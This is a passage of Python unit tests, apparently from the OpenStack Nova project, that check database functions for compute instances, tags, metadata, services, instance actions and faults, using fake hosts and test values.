db.instance_tag_set(self.ctxt, inst3.uuid, [t1, t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2]})
self._assertEqualListsOfObjects([inst2, inst3], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t3]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag_any_and_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t4])
db.instance_tag_set(self.ctxt, inst3.uuid, [t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2],
'tag-any': [t3, t4]})
self._assertEqualListsOfObjects([inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_host_and_node_no_join(self):
instance = self.create_instance_with_args()
result = db.instance_get_all_by_host_and_node(self.ctxt, 'h1', 'n1')
self.assertEqual(result[0]['uuid'], instance['uuid'])
self.assertEqual(result[0]['system_metadata'], [])
def test_instance_get_all_by_host_and_node(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
result = db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['system_metadata', 'extra'])
self.assertEqual(instance['uuid'], result[0]['uuid'])
self.assertEqual('bar', result[0]['system_metadata'][0]['value'])
self.assertEqual(instance['uuid'], result[0]['extra']['instance_uuid'])
@mock.patch('nova.db.sqlalchemy.api._instances_fill_metadata')
@mock.patch('nova.db.sqlalchemy.api._instance_get_all_query')
def test_instance_get_all_by_host_and_node_fills_manually(self,
mock_getall,
mock_fill):
db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['metadata', 'system_metadata', 'extra', 'foo'])
self.assertEqual(sorted(['extra', 'foo']),
sorted(mock_getall.call_args[1]['joins']))
self.assertEqual(sorted(['metadata', 'system_metadata']),
sorted(mock_fill.call_args[1]['manual_joins']))
def test_instance_get_all_hung_in_rebooting(self):
# Ensure no instances are returned.
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
# Ensure one rebooting instance with updated_at older than 10 seconds
# is returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=datetime.datetime(2000, 1, 1, 12, 0, 0))
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self._assertEqualListsOfObjects([instance], results,
ignored_keys=['task_state', 'info_cache', 'security_groups',
'metadata', 'system_metadata', 'pci_devices',
'extra'])
db.instance_update(self.ctxt, instance['uuid'], {"task_state": None})
# Ensure the newly rebooted instance is not returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=timeutils.utcnow())
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
def test_instance_update_with_expected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
db.instance_update(self.ctxt, instance['uuid'], {'host': 'h1',
'expected_vm_state': ('foo', 'bar')})
def test_instance_update_with_unexpected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
self.assertRaises(exception.UnexpectedVMStateError,
db.instance_update, self.ctxt, instance['uuid'],
{'host': 'h1', 'expected_vm_state': ('spam', 'bar')})
def test_instance_update_with_instance_uuid(self):
# test instance_update() works when an instance UUID is passed.
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
# Update the metadata
values = {'metadata': {'host': 'bar', 'key2': 'wuff'},
'system_metadata': {'original_image_ref': 'baz'}}
db.instance_update(ctxt, instance['uuid'], values)
# Retrieve the user-provided metadata to ensure it was successfully
# updated
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('bar', instance_meta['host'])
self.assertEqual('wuff', instance_meta['key2'])
self.assertNotIn('key1', instance_meta)
# Retrieve the system metadata to ensure it was successfully updated
system_meta = db.instance_system_metadata_get(ctxt, instance['uuid'])
self.assertEqual('baz', system_meta['original_image_ref'])
def test_delete_instance_metadata_on_instance_destroy(self):
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('foo', instance_meta['host'])
self.assertEqual('meow', instance_meta['key1'])
db.instance_destroy(ctxt, instance['uuid'])
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
# Make sure instance metadata is deleted as well
self.assertEqual({}, instance_meta)
def test_delete_instance_faults_on_instance_destroy(self):
ctxt = context.get_admin_context()
uuid = str(stdlib_uuid.uuid4())
# Create faults
db.instance_create(ctxt, {'uuid': uuid})
fault_values = {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': 404,
'host': 'localhost'
}
fault = db.instance_fault_create(ctxt, fault_values)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
db.instance_destroy(ctxt, uuid)
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
# Make sure instance faults is deleted as well
self.assertEqual(0, len(faults[uuid]))
def test_instance_update_with_and_get_original(self):
instance = self.create_instance_with_args(vm_state='building')
(old_ref, new_ref) = db.instance_update_and_get_original(self.ctxt,
instance['uuid'], {'vm_state': 'needscoffee'})
self.assertEqual('building', old_ref['vm_state'])
self.assertEqual('needscoffee', new_ref['vm_state'])
def test_instance_update_and_get_original_metadata(self):
instance = self.create_instance_with_args()
columns_to_join = ['metadata']
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'vm_state': 'needscoffee'},
columns_to_join=columns_to_join)
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(new_ref['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_update_and_get_original_metadata_none_join(self):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, {'mk1': 'mv3'})
def test_instance_update_and_get_original_no_conflict_on_session(self):
session = get_session()
# patch get_session so that we may inspect it outside of the
# method; once enginefacade is implemented, this can be simplified
with mock.patch("nova.db.sqlalchemy.api.get_session", lambda: session):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
# test some regular persisted fields
self.assertEqual(old_ref.uuid, new_ref.uuid)
self.assertEqual(old_ref.project_id, new_ref.project_id)
# after a copy operation, we can assert:
# 1. the two states have their own InstanceState
old_insp = inspect(old_ref)
new_insp = inspect(new_ref)
self.assertNotEqual(old_insp, new_insp)
# 2. only one of the objects is still in our Session
self.assertIs(new_insp.session, session)
self.assertIsNone(old_insp.session)
# 3. The "new" object remains persistent and ready
# for updates
self.assertTrue(new_insp.persistent)
# 4. the "old" object is detached from this Session.
self.assertTrue(old_insp.detached)
def test_instance_update_unique_name(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
inst1 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name1')
inst2 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name2')
inst3 = self.create_instance_with_args(context=context2,
project_id='p2',
hostname='fake_name3')
# osapi_compute_unique_server_name_scope is unset so this should work:
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name2'})
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name1'})
# With scope 'global' any duplicate should fail.
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
db.instance_update,
context1,
inst2['uuid'],
{'hostname': 'fake_name1'})
self.assertRaises(exception.InstanceExists,
db.instance_update,
context2,
inst3['uuid'],
{'hostname': 'fake_name1'})
# But we should definitely be able to update our name if we aren't
# really changing it.
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists, db.instance_update,
context1, inst2['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
db.instance_update(context2, inst3['uuid'], {'hostname': 'fake_NAME'})
def _test_instance_update_updates_metadata(self, metadata_type):
instance = self.create_instance_with_args()
def set_and_check(meta):
inst = db.instance_update(self.ctxt, instance['uuid'],
{metadata_type: dict(meta)})
_meta = utils.metadata_to_dict(inst[metadata_type])
self.assertEqual(meta, _meta)
meta = {'speed': '88', 'units': 'MPH'}
set_and_check(meta)
meta['gigawatts'] = '1.21'
set_and_check(meta)
del meta['gigawatts']
set_and_check(meta)
def test_security_group_in_use(self):
db.instance_create(self.ctxt, dict(host='foo'))
def test_instance_update_updates_system_metadata(self):
# Ensure that system_metadata is updated during instance_update
self._test_instance_update_updates_metadata('system_metadata')
def test_instance_update_updates_metadata(self):
# Ensure that metadata is updated during instance_update
self._test_instance_update_updates_metadata('metadata')
def test_instance_floating_address_get_all(self):
ctxt = context.get_admin_context()
instance1 = db.instance_create(ctxt, {'host': 'h1', 'hostname': 'n1'})
instance2 = db.instance_create(ctxt, {'host': 'h2', 'hostname': 'n2'})
fixed_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_addresses = ['2.1.1.1', '2.1.1.2', '2.1.1.3']
instance_uuids = [instance1['uuid'], instance1['uuid'],
instance2['uuid']]
for fixed_addr, float_addr, instance_uuid in zip(fixed_addresses,
float_addresses,
instance_uuids):
db.fixed_ip_create(ctxt, {'address': fixed_addr,
'instance_uuid': instance_uuid})
fixed_id = db.fixed_ip_get_by_address(ctxt, fixed_addr)['id']
db.floating_ip_create(ctxt,
{'address': float_addr,
'fixed_ip_id': fixed_id})
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[0])
self.assertEqual(set(float_addresses[:2]), set(real_float_addresses))
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[2])
self.assertEqual(set([float_addresses[2]]), set(real_float_addresses))
self.assertRaises(exception.InvalidUUID,
db.instance_floating_address_get_all,
ctxt, 'invalid_uuid')
def test_instance_stringified_ips(self):
instance = self.create_instance_with_args()
instance = db.instance_update(
self.ctxt, instance['uuid'],
{'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1')})
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
instance = db.instance_get_by_uuid(self.ctxt, instance['uuid'])
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
def test_instance_destroy(self):
ctxt = context.get_admin_context()
values = {
'metadata': {'key': 'value'}
}
inst_uuid = self.create_instance_with_args(**values)['uuid']
db.instance_destroy(ctxt, inst_uuid)
self.assertRaises(exception.InstanceNotFound,
db.instance_get, ctxt, inst_uuid)
self.assertIsNone(db.instance_info_cache_get(ctxt, inst_uuid))
self.assertEqual({}, db.instance_metadata_get(ctxt, inst_uuid))
def test_instance_destroy_already_destroyed(self):
ctxt = context.get_admin_context()
instance = self.create_instance_with_args()
db.instance_destroy(ctxt, instance['uuid'])
self.assertRaises(exception.InstanceNotFound,
db.instance_destroy, ctxt, instance['uuid'])
class InstanceMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_metadata_* methods."""
def setUp(self):
super(InstanceMetadataTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_instance_metadata_get(self):
instance = db.instance_create(self.ctxt, {'metadata':
{'key': 'value'}})
self.assertEqual({'key': 'value'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_delete(self):
instance = db.instance_create(self.ctxt,
{'metadata': {'key': 'val',
'key1': 'val1'}})
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'key1')
self.assertEqual({'key': 'val'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_update(self):
instance = db.instance_create(self.ctxt, {'host': 'h1',
'project_id': 'p1', 'metadata': {'key': 'value'}})
# This should add new key/value pair
metadata = db.instance_metadata_update(
self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
# This should leave only one key/value pair
metadata = db.instance_metadata_update(
self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
class InstanceExtraTestCase(test.TestCase):
def setUp(self):
super(InstanceExtraTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def test_instance_extra_get_by_uuid_instance_create(self):
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNotNone(inst_extra)
def test_instance_extra_update_by_uuid(self):
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_get_with_columns(self):
extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'],
columns=['numa_topology', 'vcpu_model'])
self.assertNotIn('pci_requests', extra)
self.assertIn('numa_topology', extra)
self.assertIn('vcpu_model', extra)
class ServiceTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ServiceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertIsNotNone(service['id'])
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, service[key])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2, ignored_keys=['compute_node'])
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.iteritems():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_get(self):
service1 = self._create_service({})
self._create_service({'host': 'some_other_fake_host'})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1,
ignored_keys=['compute_node'])
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
self._create_service({'host': 'host2', 'topic': 'topic2'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_host(self):
values = [
{'host': 'host1', 'topic': 't11', 'binary': 'b11'},
{'host': 'host1', 'topic': 't12', 'binary': 'b12'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': 't1'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_host(self.ctxt, 'host1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_compute_host(self):
values = [
{'host': 'host1', 'topic': CONF.compute_topic},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': CONF.compute_topic}
]
services = [self._create_service(vals) for vals in values]
real_service = db.service_get_by_compute_host(self.ctxt, 'host1')
self._assertEqualObjects(services[0], real_service,
ignored_keys=['compute_node'])
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_compute_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_args(self):
values = [
{'host': 'host1', 'binary': 'a'},
{'host': 'host2', 'binary': 'b'}
]
services = [self._create_service(vals) for vals in values]
service1 = db.service_get_by_args(self.ctxt, 'host1', 'a')
self._assertEqualObjects(services[0], service1)
service2 = db.service_get_by_args(self.ctxt, 'host2', 'b')
self._assertEqualObjects(services[1], service2)
def test_service_get_by_args_not_found_exception(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_args,
self.ctxt, 'non-exists-host', 'a')
def test_service_binary_exists_exception(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'topic': 'top1'})
self.assertRaises(exception.ServiceBinaryExists, db.service_create,
self.ctxt, values)
def test_service_topic_exists_exceptions(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'binary': 'bin1'})
self.assertRaises(exception.ServiceTopicExists, db.service_create,
self.ctxt, values)
class BaseInstanceTypeTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(BaseInstanceTypeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.user_ctxt = context.RequestContext('user', 'user')
def _get_base_values(self):
return {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': 'fake_flavor',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': True
}
def _create_flavor(self, values, projects=None):
v = self._get_base_values()
v.update(values)
return db.flavor_create(self.ctxt, v, projects)
class InstanceActionTestCase(test.TestCase, ModelsObjectComparatorMixin):
IGNORED_FIELDS = [
'id',
'created_at',
'updated_at',
'deleted_at',
'deleted'
]
def setUp(self):
super(InstanceActionTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_action_values(self, uuid, action='run_instance',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
db.instance_create(ctxt, {'uuid': uuid})
values = {
'action': action,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'user_id': ctxt.user_id,
'project_id': ctxt.project_id,
'start_time': timeutils.utcnow(),
'message': 'action-message'
}
if extra is not None:
values.update(extra)
return values
def _create_event_values(self, uuid, event='schedule',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
values = {
'event': event,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'start_time': timeutils.utcnow(),
'host': 'fake-host',
'details': 'fake-details',
}
if extra is not None:
values.update(extra)
return values
def _assertActionSaved(self, action, uuid):
"""Retrieve the action to ensure it was successfully added."""
actions = db.actions_get(self.ctxt, uuid)
self.assertEqual(1, len(actions))
self._assertEqualObjects(action, actions[0])
def _assertActionEventSaved(self, event, action_id):
# Retrieve the event to ensure it was successfully added
events = db.action_events_get(self.ctxt, action_id)
self.assertEqual(1, len(events))
self._assertEqualObjects(event, events[0],
['instance_uuid', 'request_id'])
def test_instance_action_start(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
ignored_keys = self.IGNORED_FIELDS + ['finish_time']
self._assertEqualObjects(action_values, action, ignored_keys)
self._assertActionSaved(action, uuid)
def test_instance_action_finish(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
db.action_start(self.ctxt, action_values)
action_values['finish_time'] = timeutils.utcnow()
action = db.action_finish(self.ctxt, action_values)
self._assertEqualObjects(action_values, action, self.IGNORED_FIELDS)
self._assertActionSaved(action, uuid)
def test_instance_action_finish_without_started_event(self):
"""Create an instance finish action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action_values['finish_time'] = timeutils.utcnow()
self.assertRaises(exception.InstanceActionNotFound, db.action_finish,
self.ctxt, action_values)
def test_instance_actions_get_by_instance(self):
"""Ensure we can get actions by UUID."""
uuid1 = str(stdlib_uuid.uuid4())
expected = []
action_values = self._create_action_values(uuid1)
action = db.action_start(self.ctxt, action_values)
expected.append(action)
action_values['action'] = 'resize'
action = db.action_start(self.ctxt, action_values)
expected.append(action)
# Create some extra actions
uuid2 = str(stdlib_uuid.uuid4())
ctxt2 = context.get_admin_context()
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
# Retrieve the action to ensure it was successfully added
actions = db.actions_get(self.ctxt, uuid1)
self._assertEqualListsOfObjects(expected, actions)
def test_instance_actions_get_are_in_order(self):
"""Ensure retrived actions are in order."""
uuid1 = str(stdlib_uuid.uuid4())
extra = {
'created_at': timeutils.utcnow()
}
action_values = self._create_action_values(uuid1, extra=extra)
action1 = db.action_start(self.ctxt, action_values)
action_values['action'] = 'delete'
action2 = db.action_start(self.ctxt, action_values)
actions = db.actions_get(self.ctxt, uuid1)
self.assertEqual(2, len(actions))
self._assertEqualOrderedListOfObjects([action2, action1], actions)
def test_instance_action_get_by_instance_and_action(self):
"""Ensure we can get an action by instance UUID and action id."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid1)
db.action_start(self.ctxt, action_values)
request_id = action_values['request_id']
# NOTE(rpodolyaka): ensure we use a different req id for the 2nd req
action_values['action'] = 'resize'
action_values['request_id'] = 'req-00000000-7522-4d99-7ff-111111111111'
db.action_start(self.ctxt, action_values)
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
action = db.action_get_by_request_id(self.ctxt, uuid1, request_id)
self.assertEqual('run_instance', action['action'])
self.assertEqual(self.ctxt.request_id, action['request_id'])
def test_instance_action_event_start(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
event_values = self._create_event_values(uuid)
event = db.action_event_start(self.ctxt, event_values)
# self.fail(self._dict_from_object(event, None))
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_start_without_action(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = self._create_event_values(uuid)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_start, self.ctxt, event_values)
def test_instance_action_event_finish_without_started_event(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionEventNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_without_action(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_success(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
def test_instance_action_event_finish_error(self):
"""Finish an instance action event with an error."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Error'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertEqual('Error', action['message'])
def test_instance_action_and_event_start_string_time(self):
"""Create an instance action and event with a string start_time."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {'start_time': timeutils.strtime(timeutils.utcnow())}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_start(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_events_get_are_in_order(self):
"""Ensure retrived action events are in order."""
uuid1 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
extra1 = {
'created_at': timeutils.utcnow()
}
extra2 = {
'created_at': timeutils.utcnow() + datetime.timedelta(seconds=5)
}
event_val1 = self._create_event_values(uuid1, 'schedule', extra=extra1)
event_val2 = self._create_event_values(uuid1, 'run', extra=extra1)
event_val3 = self._create_event_values(uuid1, 'stop', extra=extra2)
event1 = db.action_event_start(self.ctxt, event_val1)
event2 = db.action_event_start(self.ctxt, event_val2)
event3 = db.action_event_start(self.ctxt, event_val3)
events = db.action_events_get(self.ctxt, action['id'])
self.assertEqual(3, len(events))
self._assertEqualOrderedListOfObjects([event3, event2, event1], events,
['instance_uuid', 'request_id'])
def test_instance_action_event_get_by_id(self):
"""Get a specific instance action event."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
db.action_start(ctxt2,
self._create_action_values(uuid2, 'reboot', ctxt2))
event = db.action_event_start(self.ctxt,
self._create_event_values(uuid1))
event_values = self._create_event_values(uuid2, 'reboot', ctxt2)
db.action_event_start(ctxt2, event_values)
# Retrieve the event to ensure it was successfully added
saved_event = db.action_event_get_by_id(self.ctxt,
action['id'],
event['id'])
self._assertEqualObjects(event, saved_event,
['instance_uuid', 'request_id'])
class InstanceFaultTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceFaultTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_fault_values(self, uuid, code=404):
return {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': code,
'host': 'localhost'
}
def test_instance_fault_create(self):
"""Ensure we can create an instance fault."""
uuid = str(stdlib_uuid.uuid4())
# Ensure no faults registered for this instance
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(0, len(faults[uuid]))
# Create a fault
fault_values = self._create_fault_values(uuid)
db.instance_create(self.ctxt, {'uuid': uuid})
fault = db.instance_fault_create(self.ctxt, fault_values)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(fault_values, fault, ignored_keys)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
def test_instance_fault_get_by_instance(self):
"""Ensure we can retrieve faults for instance."""
uuids = [str(stdlib_uuid.uuid4()), str(stdlib_uuid.uuid4())]
fault_codes = [404, 500]
expected = {}
# Create faults
for uuid in uuids:
db.instance_create(self.ctxt, {'uuid': uuid})
expected[uuid] = []
for code in fault_codes:
fault_values = self._create_fault_values(uuid, code)
fault = db.instance_fault_create(self.ctxt, fault_values)
expected[uuid].append(fault)
# Ensure faults are saved
